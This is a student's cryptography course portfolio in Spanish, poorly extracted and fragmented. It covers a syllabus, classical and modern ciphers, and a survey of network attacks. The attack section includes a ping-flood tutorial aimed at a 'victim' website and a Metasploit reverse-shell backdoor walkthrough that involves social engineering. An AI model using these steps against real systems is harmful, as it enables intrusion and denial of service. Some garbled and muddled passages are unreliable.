Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
CRIPTOGRAFIA.
SEMESTRE:
6TO A.
DOCENTE:
ING . GERMANIA VELOZ
REALIZADO POR:
MARLON A. MOSQUERA
5108
ASIGNATURA: CRIPTOGRAFA
No. CRDITOS:
No. HORAS: 2
DOCENTE(A):
GERMANIA R. VELOZ R.
2.
CLASE
No
1
UNIDADES/TEMAS
Introduccin a la Criptografa. Conceptos bsicos y
terminologa. Fundamentos de criptografa
FECHA
HORARIO
2015-10-07
13:00 15:00
13:00 15:00
HORAS
2
Criptografa Clsica
Clasificacin. Esctala. Polybios
2015-10-28
Examen escrito
2015-11-04
13:00 15:00
Csar. Vigenere
2015-11-11
13:00 15:00
2015-11-18
13:00 15:00
2015-11-25
DES y 3DES
2015-12-02
13:00 15:00
2
2
2015-10-14
2015-10-21
13:00 15:00
13:00 15:00
13:00 15:00
2
2
2
10
Examen escrito
2015-12-09
13:00 15:00
11
IDEA. AES
2015-12-16
13:00 15:00
2016-01-06
13:00 15:00
12
Criptografa Asimtrica
13
2016-01-13
14
2016-01-20
15
Revisin de Proyectos
2016-01-27
13:00 15:00
16
Examen escrito
2016-02-03
13:00 15:00
Fecha Presentacin:
13:00 15:00
13:00 15:00
2
2
OBSERVACIONES
INFORMTICA Y ELECTRNICA
INGENIERA EN SISTEMAS
INGENIERA EN SISTEMAS
MATRIZ ESPOCH
PRESENCIAL
CRIPTOGRAFA
SEXTO
OCTUBRE 2015 MARZO 2016
CDIGO
NMERO DE CRDITOS
IS24185
PRERREQUISITOS
CORREQUISITOS
IS13133
VELOZ REMACHE GERMANIA DEL ROCIO
032374184-0992911096
g_veloz@espoch.edu.ec
INGENIERO EN SISTEMAS INFORMTICOS
MAGISTER EN INTERCONECTIVIDAD DE REDES
2. DESCRIPCIN DE LA ASIGNATURA
2.1.
DE
LA
ASIGNATURA
EN
Pgina 1 de 8
OBJETIVOS
Introduccin
Criptografa
la
Criptografa Clsica
Criptografa Simtrica
Comprender
los
principales cifradores de
Pgina 2 de 8
TEMAS
Conceptos
bsicos
y
terminologa
Fundamentos
de
criptografa
Sistemas de encriptacin
Clasificacin
de
los
sistemas de cifra
Confidencialidad
e
Integridad
Clasificacin
Esctala
Polybios
Csar
Vigenere
Playfair
Hill y Vernam
Clasificacin
Introduccin a los sistemas
Criptografa Asimtrica
Funciones HASH
Comprender
los
principales cifradores de
de cifra en bloque
DES y 3DES
IDEA
AES
Introduccin
Usos
RSA
Diffie-Hellman
Otros cifradores de clave
pblica
Funciones Hash
Firmas Digitales
Autoridades Certificadoras
5. ESTRATEGIAS METODOLGICAS
La metodologa que guiar a la asignatura ser activa, dinmica, reflexiva, crtica
y autocrtica lo que permitir llevar a cabo la construccin del verdadero
aprendizaje enseanza. Ser necesario apoyarnos en los siguientes mtodos y
tcnicas:
En el caso del mtodo investigativo se realizar tcnicas de observacin,
estructuracin de la planificacin, ejecucin de la planificacin y evaluacin as
como la exposicin problmica que se utilizar tcnicas de determinar el
problema, estudiar las causas del problema, formulacin de la hiptesis,
determinar los procedimientos para resolver el problema y encontrar la solucin
as como el mtodo explicativo y sus tcnicas de interpretar el objeto de
informacin, argumentar los juicios de partida, establecer las interrelaciones de
los argumentos, ordenar lgicamente las interrelacione encontradas y de exponer
ordenadamente los juicios y razonamientos, para concluir con el mtodo
observacional con sus tcnicas de determinar el objeto de observacin, analizar e
interpretar los datos, fijar los rasgos y caractersticas del objeto observado,
elaborar conclusiones y finalmente construir el informe de observacin respectivo.
6. USO DE TECNOLOGAS
Pgina 3 de 8
REALES
Infocus
Pizarrn, marcador
Aula con medios visuales.
Red informtica
Equipos
Laboratorio multimedia
Bibliografa
VIRTUALES
CONTRIBUCION
(ALTA,MEDIA,
BAJA)
EL ESTUDIANTE SER
CAPAZ DE
MEDIA
Analizar la criptografa,
identificando los diferentes
componentes de un sistema
criptogrfico
MEDIA
c. Desarrollar y gestionar
un sistema de
informacin: procesos,
componentes y
programas que cumpla
los requerimientos
solicitados.
MEDIA
d. Aplicar habilidades,
MEDIA
Pgina 4 de 8
Analizar a partir de un
problema especfico dado, la
implementacin de una
alternativa de sistema de
cifrado moderno, empleando un
algoritmo de llave pblica y/o
privado adecuado mediante el
uso de una herramienta de
Software Libre.
Aplicar mediante una
tcnicas y herramientas
tecnolgicas en la
solucin de problemas
de su profesin.
herramienta de software
criptogrfico, la gestin
adecuada de llaves pblicas,
llaves privadas, firmas digitales,
certificados digitales.
e. Trabajar efectivamente
en equipo y lograr un
buen desempeo
profesional.
MEDIA
MEDIA
MEDIA
MEDIA
MEDIA
Aplicar la documentacin
necesaria para la transferencia
del conocimiento aplicando
normas para la implementacin
de herramientas de cifrado.
Analizar el autoaprendizaje,
mediante la utilizacin de las
herramientas que se
encuentran en la actualidad
Aplicar la articulacin y
contribucin con los objetivos
institucionales y nacionales del
Plan Nacional del Buen Vivir.
8. AMBIENTES DE APRENDIZAJE
El ambiente sugerido para la asignatura requiere que las actividades y tareas
asignadas, cimienten en el estudiante los logros de aprendizaje pertinentes sobre
el manejo y aplicacin de herramientas de uso criptogrfico. En las actividades
prcticas sugeridas es conveniente que el profesor gue a los(as) estudiantes en
el desarrollo de un trabajo de investigacin, mismo que ser relacionado a una
herramienta, algoritmo, entorno o sistema de cifra criptogrfico.
Propiciar actividades de bsqueda, seleccin y anlisis de informacin en
distintas fuentes.
Propiciar el uso de las nuevas tecnologas en el desarrollo de los
contenidos de la asignatura.
Fomentar actividades grupales que propicien la comunicacin, el
intercambio argumentado de ideas, la reflexin, la integracin, la
colaboracin de y entre los estudiantes.
Pgina 5 de 8
PRIMER
PARCIAL
4
SEGUNDO
PARCIAL
5
TERCER
PARCIAL
5
1
1
8 PUNTOS
10 PUNTOS
10 PUNTOS
EVALUACIN
PRINCIPAL
12
12 PUNTOS
SUSPENSIN
20
20 PUNTOS
10. BIBLIOGRAFA
BSICA
Stalling William, Cryptography and Network Security: Principles and Practice, Ed.
Prentice Hall, 1999
COMPLEMENTARIA
Nichols Randall K., Seguridad para comunicaciones inalmbricas: redes,
protocolos, criptografa y soluciones. Ed. McGraw-Hill, 2003
Costas Santos Jess, Seguridad Informtica, Ed. RA-MA, 2011
Stallings William, Comunicaciones y redes de computadoras, Ed. Prentice Hall,
2004
Mitnick Kevin, El Arte de la intrusin, Ed. Alfa y Omega 2007
Maiwald Eric, Fundamentos de Seguridad en Redes, Ed McGraw-Hill, 2005
Jess Ortega, Lpez Miguel, Garca Eugenio, Introduccin a la Criptografa, Ed.
Monografas, 2006
Pgina 6 de 8
Pgina 7 de 8
FIRMA DE RESPONSABILIDAD
Pgina 8 de 8
CRIPTOGRAFA
HISTORIA
CRIPTOLOGA
Es
Garantizar
entidades.
Asegurar informacin autntica en doble
sentido.
Impedir que el contenido del mensaje
enviado llamado criptograma sea
modificado.
Inventa
Criptoanlisis
Criptografa
La
Encuentra
Mensaje
en claro
Algoritmo de
encriptacin
Clave
Mensaje
cifrado
Un
La
finalidad es doble:
Mensaje cifrado
A
CIFRADO
DESCIFRADO
Mensaje de
origen
Mensaje de
origen
DESCRIPTADO
Interceptado
Mensaje de
origen?
Generalidades
Componentes
La
Son
Los
mecanismos
construyen
protocolos de seguridad que son
usados en los servicios.
Se
apoyan
en
tcnicas
criptogrficas, dando origen a
Mecanismos Criptogrficos.
La Criptografa es la base de
apoyo de los servicios de
seguridad, pero no ms.
Es
Servicio
Protege
Garantiza
Evita
Propiedad
Mantiene
Puede ser:
Con prueba de origen: El receptor del
mensaje adquiere una prueba, demostrable
ante terceros del origen de los datos
recibidos.
Con prueba de envo: El receptor o el emisor
del mensaje adquieren una prueba
demostrable de la fecha y hora de envo.
Con prueba de entrega: El emisor del
mensaje adquiere una prueba, demostrable
ante terceros, de que los datos han sido
entregados al receptor adecuado.
DEFINICIN
TIPOS
Es
Si
Listo
Deseo
Sistema
de Cifrado Simtrico
- Se usa la misma clave para cifrar y
descifrar.
Sistema de Cifrado Asimtrico.
- Pareja de claves:
Una clave pblica para cifrar.
Una clave privada para descifrar (no se
puede deducir la clave privada a partir de
la clave pblica. (PKE: Public Key
Encription).
Robustez.
AES
3DES
Aleatorio
Eliminarse
patrn.
La combinacin de la sustitucin y
transposicin difunde, es decir, distribuye o
dispersa, la estructura estadstica del
mensaje sobre la totalidad del texto cifrado.
Longitud
de la clave
La
Claude
Shannon:
El adversario conoce el
sistema.
Es
Es
Hoy
Cmo
Problema
de distribucin de la clave.
Al
Cmo
Abrirlo: Quien
tiene la llave
Cerrarlo: Todos
Dispone
de dos claves:
Pblica conocida por todos (facilita
distribucin) Cifra
Privada: Conocida por el poseedor. Descibra
MATERIA:
CRIPTOGRAFIA.
SEMESTRE:
6TO A.
DOCENTE:
ING . GERMANIA VELOZ
REALIZADO POR:
MARLON A. MOSQUERA
5108
AUTENTIFICACIN
TRASHING.Su finalidad es la obtencin sin autorizacin de informacin privada a partir de la recuperacin de
archivos, documentos, directorios e, incluso, contraseas que el usuario ha enviado a la papelera
de reciclaje de su equipo.
Con esta conducta, el hacker adems de buscar el propio archivo que se ha descartado busca
datos tambin en el historial de navegacin o en los archivos que almacenan las cookies.
Toda esta informacin recolectada a partir del material descartado va a ser la base que permita al
ciberdelincuente cometer sus posteriores ataques.
MODO DE ATAQUE.Generalmente, un usuario anota su login y password en un papelito y luego, cuando lo recuerda,
lo arroja a la basura. Este procedimiento por ms inocente que parezca es el que puede
aprovechar un atacante para hacerse de una llave para entrar el sistema..."nada se destruye, todo
se transforma".
El Trashing puede ser fsico (como el caso descripto) o lgico, como analizar buffers de impresora y
memoria, bloques de discos, etc.
El Trashing fsico suele ser comn en organizaciones que no disponen de alta confidencialidad,
como colegios y universidades.
El trashing lgico, analiza buffers de impresora y memoria, bloques de discos, etc.
CONFIDENCIALIDAD
SNOOPING.Los ataques de esta categora tienen el mismo objetivo que el Sniffing: obtener la informacin sin
modificarla.
Sin embargo los mtodos son diferentes. Aqu, adems de interceptar el trfico de red, el atacante
ingresa a los documentos, mensajes de correo electrnico y otra informacin guardada, realizando
en la mayora de los casos un downloading (copia de documentos) de esa informacin a su propia
computadora, para luego hacer un anlisis exhaustivo de la misma.
El Snooping puede ser realizado por simple curiosidad, pero tambin es realizado con fines de
espionaje y robo de informacin o software. Los casos mas resonantes de este tipo de ataques
fueron: el robo de un archivo con mas de 1700 nmeros de tarjetas de crdito desde una
compaa de msica mundialmente famosa, y la difusin ilegal de reportes oficiales reservados de
las Naciones Unidas, acerca de la violacin de derechos humanos en algunos pases europeos en
estado de guerra.
MODO DE ATAQUE.Para poder explotar esta vulnerabilidad de una forma sencilla y automatizada se ha desarrollado la
herramienta DNSSnoopy. El funcionamiento de la herramienta es el siguiente:
Primero obtiene los servidores DNS del dominio solicitado.
Comprueba si alguno de ellos es vulnerable al ataque de snooping, para ello se solicita un
listado de los dominios ms comunes hasta que se encuentra alguno cacheado o se acaba
la lista.
Si se ha obtenido uno o ms servidores vulnerables se procede a probar una lista de
dominios que se indique para encontrar los cacheados con anterioridad.
Trata de calcular el tiempo que hace que se cache en el servidor vulnerable, para ello
compara el TTL obtenido del servidor cacheado con el TTL original.
DISPONIBILIDAD
DoS.Los protocolos existentes actualmente fueron diseados para ser empleados en una comunidad
abierta y con una relacin de confianza mutua. La realidad indica que es ms fcil desorganizar el
funcionamiento de un sistema que acceder al mismo; as los ataques de Negacin de Servicio
tienen como objetivo saturar los recursos de la vctima de forma tal que se inhabilita los servicios
brindados por la misma.
MODO DE ATAQUE.Como el concepto bsico del DDoS es simple, realizar los ataques es relativamente fcil. De hecho,
valdra con que hubiese un nmero suficientemente grande de personas recargando la web
continuamente para tirarla. Sin embargo, las herramientas que se suelen usar son algo ms
complejas.
Con ellas se pueden crear muchas conexiones simultneas o enviar paquetes alterados con las
tcnicas que comentaba antes. Tambin permiten modificar los paquetes poniendo como IP de
origen una IP falsa, de forma que no pueden detectar quin es el atacante real.
PING DE LA MUERTE
Para nuestro ping son -t y -l. Con la -t mandamos el ping de forma repetida y
continuada, y con la -l elegimos el peso de cada ping, en este caso bfer. Ahora
debemos conocer la IP de la web a la que queremos atacar. Para ello tecleamos un
nuevo y simple comando: ping www.webqueatacare.com y damos a Intro. En
pocos segundos nos dar una IP como veis a continuacin:
Ahora, con la IP de nuestra vctima, debemos teclear el nuevo comando que har
temblar la pgina. Os recomiendo escribirlo en un bloc de notas y luego pegarlo en
el CMD para que podis modificarlo rpidamente. El formato debe ser as: ping
123.111.23.453 -t -l 15000. Lgicamente debis cambiar la IP por la de vuestra
vctima, y la cifra final es la cantidad de bytes que estis enviando. La -t y -l son los
comandos de ping que empleamos. En la siguiente pantalla podis ver un ataque de
pings exitosos.
INTEGRIDAD:
TROYANOS.Aunque tericamente no son un virus, puesto que no cumplen con todas las caractersticas, se
incluyen en este grupo debido a que se propagan de la misma manera. Un Troyano es un pequeo
programa alojado en un archivo "husped". Su funcin es pasar inadvertido al usuario para que
despus de instalado pueda realizar diversas funciones, ocultas al usuario.
Paso 4: Damos ENTER y se crea un archivo . exe en este caso click.exe y verificamos que se
halla creado, este archivo esta en la carpeta /Home o podemos usar DOPHINque es un
explorador de archivos.
Paso 5: Ahora abrimos una sesin Metasploit la cual se puede hacer de varias formas: abrir
una
consola
terminal
y
digitamos
la
siguiente
sentencia cd
/pentest/exploits/framework3 luego ./msfconsole. La otra forma es abrir una consola
terminal y digitamos msfconsole y damos ENTER. Otra es ingresando por el menu de
backtrack 5 .
Paso 6: Una vez iniciada la sesin de MSF abrimos un listener (Escuha) que va a estar activo
espereando que el servidor que estar en la vctima se inicie. Aqu se utilizan las sentencias
siguientes:
use exploit/multi/handler [ENTER] Iniciamos el Listener.
set PAYLOAD windows/meterpreter/reverse_tcp [ENTER] Plugins de Meterpreter.
set LHOST 192.168.10.5 [ENTER] Seteamos el IP del atacante.
set LPORT 4444 [ENTER] Seteamos el puerto del atacante.
Paso 7: Ahora enviamos el backdoor (click.exe) que hicimos a nuestra victima por cualquier
de los medios antes explicados usando ingeniria social en ciertos casos para que la victima
utilice el archivo enviado.
Paso 8: Ahora podemos hacer uso de las herramientas de exploit/meterpreter para realizar
actividades remotas a la PC de la vctima. Como ejemplo haremos una captura de pantalla.
Con la sentencia :
screenshot /img.jpg
NOTA: Se debe de poner la direccin donde se guardar el archivo jpg con el scrennshot. O
por default al directorio
/opt/framework3/msf3/[nombre del archivo]
Bibliografa
Borghello, C. (2000). Segu-Info. Obtenido de http://www.seguinfo.com.ar/ataques/ataques_monitorizacion.htm
cmdsistemas. (s.f.). CMD sistemas. Obtenido de
https://cmdsistemas.wordpress.com/2013/05/14/dhcp-snooping-y-cisco/
EcuRed. (2006). Obtenido de http://www.ecured.cu/Trashing
Eduardo Puga, y. c. (29 de 09 de 2011). LOS INFORMATICOS. Obtenido de
https://losinformaticosseg.wordpress.com/2011/09/29/backdoor-el-ataque-silencioso/
Medina, I. (23 de nov. de 2014). wordpress. Obtenido de
https://ivanmedina05.wordpress.com/2014/11/23/ataques-remotos-a-los-sistemas-deinformacion/
Nolla, A. (Sep de 2010). bugBlog. Obtenido de http://blog.buguroo.com/dnssnoopy-herramientapara-hacer-dns-cache-snooping/
ogmios. (s.f.). WWW.TODOECOMMERCE.COM. Obtenido de
http://www.todoecommerce.com/ataques-informaticos.html
S/N. (2 de Agost de 2013). CHUISO.COM. Obtenido de http://chuiso.com/como-hacer-ataquesddos/
MATERIA:
CRIPTOGRAFIA.
SEMESTRE:
6TO A.
DOCENTE:
ING . GERMANIA VELOZ.
REALIZADO POR:
MARLON A. MOSQUERA
5108
Estas tcnicas se utilizan tanto en el Arte como en la Ciencia. Se puede tener como objetivo que la
criptografa era conseguir la confidencialidad de los mensajes. Para ello se disearon sistemas de
cifrado y cdigos. En aquellos tiempos la nica criptografa existente era la llamada criptografa
clsica.
Para ello los criptgrafos investigan, desarrollan y aprovechan tcnicas matemticas que les sirven
como herramientas para conseguir sus objetivos. Los grandes avances que se han producido en el
mundo de la criptografa, han sido posibles gracias a los grandes avances que se han producido en
el campo de la matemtica y la informtica.
CLASIFICACION
Existe una extensa gama de algoritmos criptogrficos pero se observara la siguiente clasificacin:
Esctala.
Polybios.
Son mtodos de cifrado clsico por los cuales los mensajes eran encriptados de manera diferente y
eficaz.
CIFRADO POLYBIOS.
El inventor de este mtodo fue el escritor griego Polybios, el cual fue nombrado como un sistema
criptogrfico, para este mtodo se coloco las letras del alfabeto en una red cuadrada de 5x5 donde
consista en hacer corresponder a cada letra del alfabeto un par de letras que indicaban la fila y la
columna, en la cual aquella se encontraba.
El escritor sugera usar este mtodo para la transmisin de mensajes a larga distancia, el gran xito
de este mtodo consiste en la conversin de letras a nmeros, la reduccin en el numero de
caracteres finales y la divisin de una unidad en dos partes manipulables separadamente.
Bibliografa
FERNANDEZ, S. (ABRIL de 2004). HEZKUNTZA. Obtenido de
http://www.hezkuntza.ejgv.euskadi.eus/r43573/es/contenidos/informacion/dia6_sigma/es_sigma/adjuntos/sigma_24/9_Criptografia
_clasica.pdf
S/N. (SEPTIEMBRE de 2015). WIKIPEDIA. Obtenido de
https://es.wikipedia.org/wiki/Cifrado_cl%C3%A1sico
WIKIMEDIA, F. (OCTUBRE de 2015). WIKIPEDIA. Obtenido de
https://es.wikipedia.org/wiki/Criptograf%C3%ADa
Mtodos de cifrado
Un mtodo de cifrado es un medio para ocultar
un mensaje, donde la letra del mensaje son
sustituidas o transpuestas por otras letras, pares
de letras y algunas veces por muchas letras.
Clasificacin:
Cifrado de cesar.
Cifrado de Atbash.
Cifrado de Rot13.
Cifrado de Afin.
Cifrado de Fracmason.
del
CIFRADO DE CESAR
Creado por Julio Cesar en siglo I d.c
Desplaza 3 espacios hacia la derecha el
alfabeto latn
Es un mtodo de cifrado monoalfabetico
por sustitucin
Las operaciones se realizan en un modulo
n.
El modulo n es el numero de alfabetos.
CIFRADO DE CESAR
Alfabeto cifrado de Cesar con mod 27.
Mod 27 se refiere a las posiciones desde 0 a 26
Es muy vulnerable y fcil de atacar
Suma +3 a la posicin, 0+3=3, A equivale a D
Resta -3 para decifrar, 3-3=0, D equivale a A
Ejemplo
INTEGRANTES:
Karen Pardo
Jimena Hernandez
Pedro Noboa
Christian Viracocha.
Marlon A. Mosquera
Alexander Baldeon
Danny Moinna
5009
4815
5880
5782
5108
5767
5885
Criptoanlisis
Criptoanlisis viene del griego krypts, escondido y analein, desatar, Es la ciencia
complementaria a la criptografa que se dedica al estudio de sistemas criptogrficos con el fin de
encontrar debilidades en los sistemas y romper su seguridad (obtener la clave secreta) sin el
conocimiento de informacin secreta con el principal objetivo de crear y analizar criptosistemas
ms seguros .
Caractersticas.
En el siglo I a.d.C., Julio Csar presenta este cifrador cuyo algoritmo consiste en el
desplazamiento de tres espacios hacia la derecha de los caracteres del texto en claro. Es un
cifrador por sustitucin en el que las operaciones se realizan mdulo n, siendo n igual al
nmero de elementos del alfabeto (latn).
Mi
Ci
ABCDEFGHIJKLMNOPQRSTUVWXYZ
DEFGHIJKLMNOPQRSTUVWXYZABC
Cada letra se cifrar siempre igual. Es una gran debilidad y hace que este sistema sea muy
vulnerable y fcil de atacar simplemente usando las estadsticas del lenguaje.
USOS
Se utiliza para referirse a cualquier intento de sortear la seguridad de otros tipos de algoritmos y
protocolos criptogrficos en general, y no solamente el cifrado.
Se lo usa para descifrar comunicaciones encriptadas sin conocer las llaves correctas.
Se lo utiliza para Violar los sistemas criptogrficos.
Se lo utiliza para:
Ataques a textos cifrados (Ciphertext-only attack)
Ataques de texto plano conocidos
Ataques de texto plano seleccionado
Ataque de hombre en medio
Ataques contra el hardware o utilizando el hardware base
CRIPTOANALISIS
Karen Pardo 5009
Jimena Hernandez 4815
Pedro Noboa 5880
Christian Viracocha. 5782
Marlon A. Mosquera (5108
Alexander Baldeon (5767
Que es Criptoanalisis
Criptoanlisis viene del griego krypts,
escondido y analein, desatar
Es la ciencia complementaria a la
criptografa que se dedica al estudio
de sistemas criptogrficos con el fin de
encontrar debilidades en los sistemas y
romper su seguridad (obtener la clave
secreta) sin el conocimiento de informacin
secreta con el principal objetivo de crear y
analizar criptosistemas ms seguros .
Mtodos de criptoanlisis
Para la reconstruccin de un mensaje
cifrado en texto simple se utiliza mtodos
matemticos, generalmente se distinguen
cuatro mtodos de criptoanlisis:
I.
II.
III.
IV.
Caractersticas.
Usos
ABCDEFGHIJKLMNOPQRSTUVWXYZ
DEFGHIJKLMNOPQRSTUVWXYZABC
Fecha: 14/10/2015
CIFRADO POLIALFABTICO
Los sistemas polialfabticos cambian smbolos del texto original por otros smbolos para formar el texto
cifrado. La diferencia con los sistemas monoalfabticos es que no siempre se cambia un smbolo del
texto ariginal por el mismo smbolo en el texto cifrado sino que el smbolo por el que se cambiar
depender del smbolo que se va a sustituir y de la posicin que ocupe.
Los cifrados polialfabticos aplican varias sustituciones monoalfabticas al texto llano. Segn la
posicin del smbolo a cifrar le aplicarn una sustitucin monoalfabtica u otra.
Primero veremos los mtodos generales y luego entraremos en algunos casos particulares tal y como se
detalla a continuacin:
MTODOS POLIALFABTICO
o Mtodo de Kasiski
o Mtodo del ndice de Coincidencia
Casos particulares
o Criptosistema de Vigenere
o Cifrado de Beaufort
o Cifrado de llave continua
o Cifrados de Vernam y cuadernos de un slo uso
CASOS PARTICULARES
El cifrado de Vigenre se basa en una matriz cuadrada 26x26 donde aparecen los 26 alfabetos de
desplazamiento correspondientes al alfabeto ordinario de 26 letras. Para poder cifrar lo primero que
hay que hacer es superponer la clave secreta (un texto) sobre el texto plano repitindola tantas veces
como sea necesario. Cada letra del texto plano se sustituir por la letra que le corresponde en el
alfabeto designado de la siguiente forma: El alfabeto seleccionado ser aquel en el que la letra que le
corresponde de la clave es sustituida por la letra 'A'.
CUADRO DE VIGENRE
BIBLIOGRAFA
http://www.kriptopolis.com/criptografia-clasica-x
https://upload.wikimedia.org/wikipedia/commons/6/6d/VigenereSquare2.jpg
Generalidades
Procedimiento
Unidad de cifrado de
clave simtrica que
opera en grupos de bits
de longitud fija (bloque:
64 a 128 bits).
Su dato de entrada es un
bloque de texto plano o
claro y lo cifra en
bloques de igual tamao.
La transformacin es
controlada por una
segunda entrada CLAVE
secreta.
DES:
Cuando
El
Tiene
Investigar
http://bibliotecadigital.usbcali.edu.co/jspui
/bitstream/10819/193/1/sistemas_embebido
s.pdf
Definicin
Surge
X1
X2
X3
X4
X1
X2
X3
X4
Es
DES
3DES
AES
56
112 or 168
Key Strength
Weak
Strong
Strong
Processing
Requirements
Moderate
High
Modest
RAM Requirements
Moderate
High
Modest
14
MATERIA:
CRIPTOGRAFIA.
SEMESTRE:
6TO A.
DOCENTE:
ING . GERMANIA VELOZ
REALIZADO POR:
MARLON A. MOSQUERA
5108
CIFRADO DE FLUJO
INTRODUCCION
Generalmente operan sobre 1 bit (o sobre bytes o palabras de 16 32 bits) de los datos de
entrada cada vez. El algoritmo genera una secuencia (secuencia cifrante o keystream en ingls) de
bits que se emplea como clave. La cifrado se realiza combinando la secuencia cifrante con el texto
en claro.
El paradigma de este tipo de algoritmos es el One Time Pad, que funciona aplicando una XOR (orexclusiva) a cada bit de la entrada junto con otro generado aleatoriamente para obtener cada bit
de la salida. La secuencia de bits aleatorios es la clave de la sesin, secuencia de cifrado o el pad,
que es del mismo tamao que la entrada y la salida. Para recuperar el texto original el texto
cifrado debe pasar por el mismo proceso empleado para cifrar usando el mismo pad. Este
algoritmo es conocido por ser el nico incondicionalmente seguro, aunque, como las claves son
del mismo tamao que la entrada, es de poca utilidad prctica.
DESARROLLO
Siguiendo la propuesta de cifrador hecha en 1917 por Vernam, los cifradores de flujo (clave
secreta) usan:
Una cifra basada en la funcin XOR.
Una secuencia cifrante binaria y aleatoria S que se obtiene de una clave secreta K compartida
por emisor y receptor.
Un algoritmo de descifrado que es igual al de cifrado por la involucin de la funcin XOR.
TIPOS DE ALGORITMOS:
Sistemas ms conocidos:
A5: Algoritmo no publicado propuesto en 1994. Versiones A5/1 fuerte (Europa) y A5/2
dbil (exportacin).
RC4: Algoritmo de RSA Corp. (Rivest Cipher #4) desarrollado en el ao 1987, usado en
Lotus Notes y luego en el navegador de Netscape desde 1999. No es pblico.
SEAL: Algoritmo propuesto por IBM en 1994.
Entonces,
que es un valor demasiado bajo incluso para mediados de la
dcada pasada.
ESQUEMA:
Bibliografa
Aguirre, J. (2006). criptosec.unizar.es. Obtenido de
http://criptosec.unizar.es/doc/tema_c3_criptosec.pdf
Gomez, R. (s.f.). CriptoMex. Obtenido de http://cryptomex.org/SlidesCripto/CriptoSimFlujo.pdf
S/N. (2012). Red y Seguridad. Obtenido de http://redyseguridad.fip.unam.mx/proyectos/criptografia/criptografia/index.php/2-tecnicas-clasicas-decifrado/24-formas-de-procesamiento-de-datos/242-cifrador-en-flujo
S/N. (2014). Ecured. Obtenido de http://www.ecured.cu/RC4
Talens-Oliag, S. (s.f.). uv.es. Obtenido de http://www.uv.es/sto/articulos/BEI-200304/criptologia.html#id2440584
MATERIA:
CRIPTOGRAFIA.
SEMESTRE:
6TO A.
DOCENTE:
ING . GERMANIA VELOZ
REALIZADO POR:
MARLON A. MOSQUERA
5108
DES
TAMAO(BITS)
56
AES
3DES
112-168
IDEA
64
RIJNDAEL
128-256
VENTAJAS
Es muy rpido y fcil de
implementarEs uno de los sistemas ms
empleados y extendidos, por
tanto es de los ms probados.
DESVENTAJAS
Emplea una clave
demasiado corta, lo
cual hace que con el
avance actual de los
ordenadores,
los
ataques por la fuerza
bruta se puedan
llevar a cabo.
Es rpido tanto en software Algoritmo
para
como
en
hardware, usuarios de routers,
relativamente
fcil
de ya que WPA opera
implementar, y requiere poca con
AES
como
memoria.
mtodo de cifrado.
5009
5887
TRABAJO EN CLASE DE CRIPTOGRAFIA
ATAQUES
TIPOS DE ATAQUES
Seguridad de red
Spoofing
Tecnicas de suplantacion de
identidad
Spoofing-Looping
una manera usual es conseguir el
nombre y password de un
usuario legitimo
Tipos de Ataques
Web Spoofing
Ataques DOS
Colapsar un sistema
sobrecargandolo de peticiones.
Disponibilidad (DoS)
Ataque DOS distribuido
Ataques DDOS
Multiples equipos "zombis"
Fuerza Bruta
Robo de credenciales
Confidencialidad
Integridad
Robo de cookies
Inyeccion de SQL
Defacement
ATAQUES RED
ATAQUE POR INTROMISION
Se da cuando alguien abre archivos uno tras otro en nuestra computadora hasta encontrar
algo que sea de su inters. Puede ser una persona que convive con nosotros.
ATAQUE DE ESPIONAJE EN LINEA
Se da cuando alguien escucha una conversacin y no es invitada a ella. Es muy comn en redes
inalmbricas ya que no se requiere de un dispositivo conectado a la red, basta, con un rango
donde la seal de la red llegue a un automvil o un edificio cercano.
ATAQUE DE INTERSECCION
Se dedica a desviar la informacin a otro punto que no sea el destinatario y as poder revisar
los archivos, informacin y contenidos en un flujo de red.
ATAQUE DE MODIFICACION
Se dedican a negarles el uso de los recursos a los usuarios legtimos del sistema, de la
informacin o inclusive de algunas capacidades del sistema como por ejemplo:
- intento de inundar una red, impidiendo el trfico legtimo de red.
- intento de romper la red entre 2 computadoras.
- intento de impedir el acceso de un usuario individual a un servicio.
- intento de romper los servicios a un sistema.
ATAQUE DE SUPLANTACION
Se dedica a dar informacin falsa o anular una transaccin y/o hacerse pasar por un usuario
conocido. Se ha puesto de moda los nuevos ladrones han hecho portales similares a los
bancarios donde las personas han descargado sus datos de tarjetas de crdito sin encontrar
respuesta; posteriormente sus tarjetas son vaciadas.
ATAQUES SOFTWARE
Es un tipo de software que tiene como propsito infiltrarse y daar una computadora o sistema
de informacin sin el consentimiento de los propietarios.
Los malware son considerados en funcin de los efectos que provoquen, incluyendo diferentes
tipos como son:
Virus y Gusanos: stos, son los tipos ms conocidos de software maligno que existen y
se distinguen por la manera en que se propagan. El trmino de virus informtico se
usa para designar un programa que al ejecutarse se propaga infectando otro software
ejecutable de la misma computadora. Pueden tener un playload que realice otras
acciones maliciosas en donde se borran archivos. Los gusanos son programas que se
transmiten as mismos, explotando vulnerabilidades en una red de computadoras para
Drive-by Downloads: Son sitios que instalan spyware o cdigos que dan informacin
de los equipos. Generalmente se presentan como descargas que de algn tipo, se
efectan sin consentimiento del usuario, lo cual ocurre al visitar un sitio web, al revisar
un mensaje de correo o al entrar a una ventana pop-up. El proceso de ataque Drive-by
Downloads se realiza de manera automtica mediante herramientas que buscan en los
sitios web alguna vulnerabilidad e insertan un script malicioso dentro del cdigo
HTML.
Hijackers: Son programas que realizan cambios en la configuracin del navegador web,
cambiando la pgina de inicio por pginas con publicidad, pornogrficas u otros re
direccionamientos con anuncios de pago o pginas de phishing bancario. sta es una
tcnica que suplanta al DNS, modificando archivos hosts, para redirigir el dominio de
una o varias pginas a otras, muchas veces una web falsa que imita a la verdadera.
Comnmente es utilizada para obtener credenciales y datos personales mediante el
secuestro de una sesin.
Rogue software: Hacen creer al usuario que la computadora est infectada por algn
tipo de virus u otro tipo de software malicioso, esto induce al usuario a pagar por un
software intil o a instalar un software malicioso que supuestamente elimina las
infecciones, pero el usuario no necesita ese software puesto que no est infectado.
NOMBRE:
MARLON A. MOSQUERA 5108
KLEBER HIPO 5324
JIMENA HERNANDEZ 4815
MATERIA:
CRIPTOGRAFIA
Cualquier equipo conectado a una red informtica puede ser vulnerable a un ataque.
Un "ataque" consiste en aprovechar una vulnerabilidad de un sistema informtico (sistema
operativo, programa de software o sistema del usuario) con propsitos desconocidos por el
operador del sistema y que, por lo general, causan un dao.
Los ataques siempre se producen en Internet, a razn de varios ataques por minuto en cada
equipo conectado. En su mayora, se lanzan automticamente desde equipos infectados (a
travs de virus, troyanos, gusanos, etc.) sin que el propietario sepa lo que est ocurriendo. En
casos atpicos, son ejecutados por piratas informticos.
